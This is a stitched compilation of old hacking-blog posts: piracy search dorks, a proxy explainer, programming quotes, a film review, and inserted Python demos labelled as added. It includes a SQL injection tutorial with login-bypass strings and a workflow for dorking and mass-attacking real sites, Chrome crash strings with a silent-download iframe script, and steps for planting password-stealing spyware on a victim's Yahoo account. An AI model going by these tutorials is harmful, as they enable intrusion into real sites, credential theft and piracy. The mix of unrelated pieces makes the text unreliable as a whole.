How to Download MP3’s from WWW using Google

Author: asish

There are always a lot of search queries on Google for free mp3’s. Unfortunately a direct search for free mp3’s always leads to a wild goose chase that will not get you to the source of the mp3’s that you want. What then is the secret behind getting mp3’s on the internet?

Actually it is fairly easy to get hold of mp3’s by searching in site directories. This search, with a little modification, will also help locate PDFs, photos, spreadsheets and more.

Let’s start with an easy search. Type into Google the following:

?intitle:index.of? mp3 [artist] [title]

Replace [artist] with the artist/singer/band you’re looking for and [title] with the song title. Just one of them is also fine.

As if by magic, a list of mp3’s with your search terms will appear. You can download a file by right-clicking on it and then selecting Save As.

As an alternative, you can also use the following query to search for MP3s on the web:

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums [artist] [title]

Same as above, just replace [artist] and [title] with the artist/singer/band name and the song title.

A third search term is as follows:

?inurl:multiply.com/music? [artist] [title]

And a last one that will also work just fine:

-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.mp3|.wma) [artist] [title]

Happy hunting

Favorite Programming Quotes

Author: asish


The first 90 percent of the code accounts for the first 90 percent of the development time…The remaining 10 percent of the code accounts for the other 90 percent of the development time.
Tom Cargill

Most of you are familiar with the virtues of a programmer. There are three, of course: laziness, impatience, and hubris.
Larry Wall

Measuring programming progress by lines of code is like measuring aircraft building progress by weight.
Bill Gates

Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it.
Brian W. Kernighan

Once a new technology starts rolling, if you’re not part of the steamroller, you’re part of the road.
Stewart Brand

In theory, there is no difference between theory and practice. But, in practice, there is.
Jan L. A. van de Snepscheut

The hardest part of design … is keeping features out.
Donald Norman

Before software can be reusable it first has to be usable.
Ralph Johnson

If debugging is the process of removing bugs, then programming must be the process of putting them in.
Edsger Dijkstra

Software and cathedrals are much the same - first we build them, then we pray.
Anonymous Preacher

The goal of Computer Science is to build something that will last at least until we’ve finished building it.
Anonymous Consultant

The software isn’t finished until the last user is dead.
Anonymous Support Group Member

Better train people and risk they leave - than do nothing and risk they stay.
Anonymous Technical Trainer

Programming is 10% science, 20% ingenuity, and 70% getting the ingenuity to work with the science.
Anonymous Scientist

All programmers are playwrights and all computers are lousy actors.
Anonymous Hack Actor

Bad code isn’t bad, it’s just misunderstood.
Anonymous Code Behaviorist

It is easier to measure something than to understand what you have measured.
Anonymous Analyst

The sooner you get behind in your work, the more time you have to catch up.
Anonymous Scheduler

When a programming language is created that allows programmers to program in simple English, it will be discovered that programmers cannot speak English.
Anonymous Linguist

Benchmarks don’t lie, but liars do benchmarks.
Anonymous Tester

Why do we never have time to do it right, but always have time to do it over?
Anonymous Code Monkey

15 Search Engines To Search Files on Rapidshare

Author: asish

RapidShare is probably one of the biggest and fastest web hosters worldwide. Rapidshare actually originated from rapidshare.de and switched over to rapidshare.com some time ago to give the web host a worldwide recognized meaning. Still, it lacks some basic features, one of which is the ability to search the hosted files.

15 Search Engines To Hunt Rapidshare Files

Rapidshare is a free-for-all web host where everyone can upload a file of their choice. However, to download a file you need a link to the rapidshare server where the file is actually hosted. This is good in terms of privacy, but what if you want to download software, movies, music or ebooks of your choice and you don’t know the links? That is where these rapidshare search engines do the job for us. Just type in your keywords and they will hunt down files relating to those keywords hosted on rapidshare.

Here is a complete list of 15 Rapidshare Search Engines. Use them well and have fun :)

  1. Filez
  2. RapidFox
  3. HellaFiles
  4. RapidShared
  5. ShareMiner
  6. FilesBot
  7. RapidOSearch
  8. RapidSearchEngine
  9. RapidshareLink
  10. OneClickFiles
  11. SearchShared
  12. EatPaperRapidshare
  13. FileSearcher
  14. MegaDownload
  15. RapidshareURL

This will definitely make it easy for you to search rapidshare files instead of using complex Google operators. Enjoy and use them wisely.

Anonymity of proxy server explained

Author: asish

How Does a Proxy Server Work?

This is the first question that arises in our mind when we use proxy servers for surfing the Internet without revealing our identity to others. Here all these mind-boggling questions are answered with easy-to-understand examples.

The exchange of information in Internet is made by the “client - server” model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.

What your browser transmits to a web-server:
a name and a version of an operating system
a name and a version of a browser
configuration of a browser (display resolution, color depth, java / javascript support, …)
IP-address of a client
Other information

The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:
a country where you are from
a city
your provider’s name and e-mail
your physical address

Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).

These are some environment variables:

REMOTE_ADDR - IP address of a client

HTTP_VIA - if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.

HTTP_X_FORWARDED_FOR - if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.

HTTP_ACCEPT_LANGUAGE - what language is used in browser (what language a page should be displayed in)

HTTP_USER_AGENT - the so-called “user agent”. For all browsers this is Mozilla. Furthermore, the browser’s name and version (e.g. MSIE 5.5) and the operating system (e.g. Windows 98) are also mentioned here.

HTTP_HOST - is a web server’s name

This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, …). Their quantity can depend on settings of both a server and a client.

These are examples of variable values:

REMOTE_ADDR = 194.85.1.1
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5

Anonymity at work in Internet is determined by what environment variables “hide” from a web-server.

If a proxy server is not used, then environment variables look in the following way:

REMOTE_ADDR = your IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

According to how environment variables are “hidden” by proxy servers, there are several types of proxies.

Transparent Proxies

They do not hide information about your IP address:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP

The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information caching, organization of joint access to Internet of several computers, etc.

Anonymous Proxies

All proxy servers that hide a client’s IP address in any way are called anonymous proxies.

Simple Anonymous Proxies

These proxy servers do not hide the fact that a proxy is used, however they replace your IP with their own:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP

These proxies are the most widespread among other anonymous proxy servers.

Distorting Proxies

As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client’s IP address (your IP address) is replaced with another (arbitrary, random) IP:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address

High Anonymity Proxies

These proxy servers are also called “high anonymity proxy”. In contrast to other types of anonymity proxy servers they hide the fact that a proxy is used:

REMOTE_ADDR = proxy IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

That means that values of variables are the same as if proxy is not used, with the exception of one very important thing - proxy IP is used instead of your IP address.

Summary

Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!
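How a web server could apply the classification above to an incoming request, as an added example that is not part of the original post. The function and label names are assumptions, and the sample requests are constructed from the addresses shown earlier. It also shows what the server cannot decide: Via and X-Forwarded-For are supplied by the sender, so a transparent and a distorting proxy look identical, as do a direct client and a high anonymity proxy.

```python
import ipaddress


def parse_forwarded_for(value):
    """Return the syntactically valid IPs in an X-Forwarded-For value."""
    ips = []
    for part in (value or "").split(","):
        try:
            ips.append(ipaddress.ip_address(part.strip()))
        except ValueError:
            pass  # sender-controlled header: skip anything that is not an IP
    return ips


def classify_request(environ):
    """Map CGI-style variables to the proxy types described in the post."""
    remote = ipaddress.ip_address(environ["REMOTE_ADDR"])  # TCP peer address
    via = (environ.get("HTTP_VIA") or "").strip()
    xff_raw = (environ.get("HTTP_X_FORWARDED_FOR") or "").strip()
    xff = parse_forwarded_for(xff_raw)

    if not via and not xff_raw:
        # Headers alone cannot separate these two cases.
        return "direct-or-high-anonymity"
    if xff_raw and not xff:
        # Header present but holds no usable address (e.g. "unknown").
        return "proxy-malformed-forwarded-for"
    if not xff:
        # Via only: the proxy announces itself but forwards no client IP.
        return "proxy-without-client-ip"
    if all(ip == remote for ip in xff):
        # The proxy put its own address where the client IP would go.
        return "simple-anonymous"
    # A different address is claimed; it may be real (transparent proxy)
    # or made up (distorting proxy), and the server cannot verify which.
    return "transparent-or-distorting"


# Constructed sample requests using the addresses from the post.
SAMPLES = {
    "no proxy headers": {"REMOTE_ADDR": "194.85.1.1"},
    "page example": {
        "REMOTE_ADDR": "194.85.1.1",
        "HTTP_VIA": "194.85.1.1 (Squid/2.4.STABLE7)",
        "HTTP_X_FORWARDED_FOR": "194.115.5.5",
    },
    "proxy IP repeated": {
        "REMOTE_ADDR": "194.85.1.1",
        "HTTP_VIA": "194.85.1.1 (Squid/2.4.STABLE7)",
        "HTTP_X_FORWARDED_FOR": "194.85.1.1",
    },
    "garbage header": {
        "REMOTE_ADDR": "194.85.1.1",
        "HTTP_X_FORWARDED_FOR": "unknown",
    },
}

if __name__ == "__main__":
    for name, env in SAMPLES.items():
        print(f"{name}: {classify_request(env)}")
```
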

List of all sql injection strings

Author: asish

One of the major security problems with SQL surrounds the login and URL strings. This tutorial is not going to go into detail on why these strings work, as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems.

First SEARCH the following Keywords in Google or any Search Engine:

admin\login.asp
login.asp

With these two search strings you will have plenty of targets to choose from…choose one that is vulnerable

INJECTION STRINGS: How to use it?

This is the easiest part…very simple

On the login page just enter something like

user:admin (you don’t even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

Some sites will have just a password so

password:' or 1=1--

In fact I have compiled a combo list with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.

The one I am interested in are quick access to targets

PROGRAM

I tried several programs to use with these search strings and up to now only Ares has performed well with quite a bit of success with a combo list formatted this way. Yesterday I loaded 40 eastern targets with 18 positive hits in a few minutes. How long would it take to go through 40 sites cutting and pasting each string?

combo example:

admin:' or a=a--
admin:' or 1=1--

And so on. You don’t have to be admin and still can do anything you want. The most important part is example:' or 1=1-- this is our basic injection string
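Why the basic string works against a login check that pastes input into the SQL text, and why a parameterized lookup with a hashed password rejects it, shown as an added example that is not part of the original post. The table layout, function names and password are constructed for illustration, and SQLite stands in for the site's database.

```python
import hashlib
import hmac
import os
import sqlite3


def hash_password(password, salt):
    """Derive a password hash; only the salt and hash need to be stored."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    """In-memory database with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (name TEXT PRIMARY KEY, pw TEXT, salt BLOB, pw_hash BLOB)"
    )
    salt = os.urandom(16)
    pw = "s3cret-constructed"  # constructed sample password
    # The plaintext 'pw' column exists only so the vulnerable variant can run.
    db.execute(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        ("admin", pw, salt, hash_password(pw, salt)),
    )
    return db


def login_vulnerable(db, name, password):
    """Deliberately vulnerable: user input becomes part of the SQL statement."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND pw = '{password}'"
    # With password = "' or 1=1--" the statement ends in
    #   ... AND pw = '' or 1=1--'
    # so the WHERE clause is always true and the trailing quote is commented out.
    return db.execute(sql).fetchone() is not None


def login_hardened(db, name, password):
    """Parameterized lookup: input is bound as data and never parsed as SQL."""
    row = db.execute(
        "SELECT salt, pw_hash FROM users WHERE name = ?", (name,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    # Constant-time comparison of the derived hash against the stored one.
    return hmac.compare_digest(hash_password(password, salt), stored)


if __name__ == "__main__":
    db = make_db()
    attempt = "' or 1=1--"
    print("vulnerable accepts string:", login_vulnerable(db, "admin", attempt))
    print("hardened accepts string:  ", login_hardened(db, "admin", attempt))
    print("hardened accepts real pw: ", login_hardened(db, "admin", "s3cret-constructed"))
```
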

Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO…G=Google+Search

17,000 possible targets; trying various searches spews out plenty more

Now using proxy set in my browser I click through interesting targets. Seeing what’s what on the site pages, if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on. In a couple of hours you can build up quite a list because I don’t select all results or spider for log in pages. I then save the list fire up Ares and enter

1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start.

Now I don’t want to go into problems with users using Ares..thing is I know it works for me…

Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will save quite a bit of time going to each site and each string to find it’s not exploitable.

There you go you should have access to your vulnerable target by now

Another thing: you can use the strings in the URLs where user=? Edit the URL to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process

Combo List

There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.

Happy Hunting

Vulnerabilities of google chrome

Author: asish

Ok, news is old, Google has released a new browser and all the web is blogging about it. But my duties are to talk about security so I’m not going to review Google Chrome’s features but to list the vulnerabilities already found after only 16 hours from the release. (I fear this post will be outdated in a few hours)

Rishi Narang has been the first. A Denial Of Service simple as pie:

Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):

CRASH ME

Just “evil:%” in the anchor text is capable of crashing all the Chrome tabs (even though all the tabs are separate processes).

Someone has also reported that entering a very long bookmark may kill the browser. Length has not been given but it’s worth a try.

If your Chrome is still alive you may want to try entering

about@:

in the location bar.

Good thing is that the browser doesn’t need Administrator rights to run.

Matt Cutts has stated on his blog that chapter 11 of the EULA will be updated. Yes, the chapter about you giving all the rights to Google:

a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.

I’m worried about the enthusiastic reviews I see online.
The Google brand was enough to push an unfinished product to 1% of the User-Agents used on its very first day.
The risk is high, fuzzers are still crunching…

Update:

Another Bug found.
<script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script>

This script should (I haven’t tested it yet, will do it later) trigger a silent download on the client machine.

The dark knight review

Author: asish

You can read this review in the new issue of Southern Exposure Magazine:

"The Dark Knight"
by Ryan Smith

Comic book movies have been on a roller-coaster for the last ten years. “X-Men” was just ok, “X2” was good, “X-Men: The Last Stand” was forgettable. “Spider-Man” was decent, “Spider-Man 2” was fantastic, “Spider-Man 3” was average. “Superman Returns” was visually stimulating but narratively crippled. “Hulk” was better than people gave it credit for (haven’t seen the new one), “Hellboy” was great, “Hellboy II” was fun but not as good as the first, “300” was a two-hour music video, “Iron Man” was wonderful, “V For Vendetta” was better than expected, “Sin City” was nice to look at but gave me a stomach ache, and I hear “Daredevil”, “Fantastic Four”, “Catwoman”, and “The Punisher” aren’t worth my time.

So what about “Batman Begins”? Well, if you ask me, I think it’s towards the top of the list, easily one of the best comic book movies of all time. Director Christopher Nolan took a campy concept and turned it into an epic gothic drama that made you believe a grown man might just put on tights and fight crime (given the appropriate motivation).

But now “The Dark Knight” comes along and not only surpasses the first film, but manages to rise above every other comic book movie I can think of. I’ve been racking my brain and I just can’t come up with another that compares in terms of action, characters, narrative structure, and expectations. This is a truly satisfying movie.

Be warned though; the title is appropriate. This is one dark affair. Heath Ledger’s Joker is one of the most frightening movie villains in quite some time and Harvey Dent’s transformation into Two-Face is quite disturbing as well (just because Wal Mart carries Batman action figures doesn’t mean you should take your kids to this one). But for fans of the first film, you certainly won’t be disappointed here.

As I mentioned, Ledger (who is a shoo-in for a posthumous Oscar) is truly chilling. Forget the Joker you know, the one who wants to take over the world. Ledger’s Joker just wants to watch the world burn. A genuine anarchist, this skinny freak creates chaos not in the name of a particular creed, but for the sake of chaos itself. From the first scene, we know the clown in the purple suit isn’t one to mess with. And he proves to be a bona fide threat to Christian Bale’s Batman, who has been shunned by the city he strives to protect.

Unlike many films in the genre, “The Dark Knight” manages to dig deep into the human condition, dealing with authentic emotions such as loneliness and despair, and conflicting ideologies such as choice vs. chance and chaos vs. order. Like the first film, “The Dark Knight” makes it clear that it is our choices that define us.

This isn’t the best comic book movie of the year. “The Dark Knight” just swept away the competition to become the best comic book movie of all time.

Hack yahoo ID

Author: asish

It is the easiest way to hack anyone's Yahoo ID's Password.

Follow these steps to hack the Yahoo ID

1. U have to make a server {spyware} given ur email id.

2. Send the server to the victim's computer anyhow.

3. When he will open it he cant realize that it was a spyware because after opening it, it will be deleted automatically.

4. After opening this file, when he goes to log in to his yahoo id, his password and id will be sent to ur given yahoo email id.

5. U can also disable his OS's many features .

There are three types of software by which u can make your own spyware {server}
U can download anyone and use it.

Files:

1. Y-Jacked
2. SH-Yahoo pass sender.
3. Yahoo Hack.

All about google

Author: asish

When someone says Google, I think at least 60%-70% of people reply that it's a "Search Engine". Do you know that Google has so many things going on that we don't even know they exist? Google has the ability to search for images, news, blogs, music, video, maps, products, answers, notebook, linux, apple, movies, definitions and the list goes on...

One thing I don't understand is why when we visit Google's URL (www.google.com), we only see a very simple and clean search page instead of a full featured page like Yahoo? At least now it's much better with a navigation bar where it shows Web, Images, Video, News, Maps, Gmail and more but it's still NOT complete.


Here's a quote taken from Don Norman's "The Truth About Google's Simplicity".

Why are Yahoo! and MSN such complex-looking places? Because their systems are easier to use. Not because they are complex, but because they simplify the life of their users by letting them see their choices on the home page: news, alternative searches, other items of interest. Yahoo! even has an excellent personalization page, so you can choose what you wish to see on that first page.

Take another careful look at Google's front page. Want a map? You have to click once to be offered the choice, then a second additional time to get to the map page. Want to use Google Scholar to check references? Um, well, is that "Advanced Search" or "more." What about their newly announced blog search? Why is Google maps separate from Google Earth? (Oh, those were purchased from different companies. Yes, but why should I, the user, care about the history of Google's acquisitions?)

Anyway, continue reading to check out the list of free and hidden services offered by google in ONE page.

Simply Google has created a page that includes every Google hidden feature.


Chris McEvoy created the original Simply Google but the latest updated version is at the link below. It has more links compared to the original version.

If your web browser's start page is Google.com, you might want to change it to Simply Google because it's more complete than the original and simple Google.com page.

[ Visit Simply Google ]

Hack Rapidshare and all other file hosting websites

Author: asish

Universal Share Downloader (USDownloader), also called RapidShare downloader or MyTempDir downloader, is actually not a crack or hack program. Instead, Universal Share Downloader is a download manager for automatically downloading a list of files from the most popular free uploaders or free unlimited file hosting servers such as RapidShare, MegaUpload, YouSendIt, FileFactory, etc.

Normally, if you’re not a premium, paid or upgraded member of a free unlimited or one-click file hosting, web space and file delivery service, the service will have some limitations when you try to download files from the server, such as no concurrent parallel downloads, so you have to download one file after another has finished downloading. Besides, you’re also limited to a certain download bandwidth based on time and IP address, a download time delay (a reserved “download ticket” system and no instant download start) and slower download speed.


AllFiles, Audiofind, Badongo, BestSharing, Come2Store, Datenko, DepositFiles, EasySharing, FileDepartment, FileFactory, FileHD, FileSpace, GetFileBiz, HemenPaylas, HyperUpload, iFolder, MegaShares, MegaUpload, MyTempDir, Quickdump, Rapidfile.fr, RapidShare, RapidUpload, RecFile, SaveFile, Sendmefile, SexUploader, ShareAm, SimpleUpload, Slil, SpbLand, StoreandServe, SupaShare, TurboShare, TurboUpload, UniversalVideo, Upfile, Upload2, Uploading, UploadPort, UploadSend, WebFile, WebFileHost, YourFile, YourFileHost, YourFileLink, YouSendIt and zShare

Note: For a list of proxy servers, you can download a program called GeoWhere, use it to search for available proxy servers on the Internet, and put all the found proxies into a text file. You should use only anonymous proxies, as a transparent proxy will reveal your IP address too. Alternatively, several websites have a long list of open public proxy servers that can be used by the USDownloader, such as Proxy.6te.net and Proxy.org. Proxy List even allows you to download a list of proxy servers in a text file format (remember to download only anonymous or elite proxies by searching for the type before downloading).

Best of all, Universal Share Downloader is freeware, and no installation is needed. Just download the Universal Share Downloader v 1.3.4 Beta 8 zip file, extract it and run USDownloader.exe. The few limitations of Universal Share Downloader include being unable to download normal download links (it works on those file sharing/hosting services only), and it does not yet support parallel, concurrent and multi-threaded downloading in the current (1.3.3) version (to enable it now, you have to launch multiple instances of USDownloader.exe).

Homepage (in Russian): Universal Share Downloader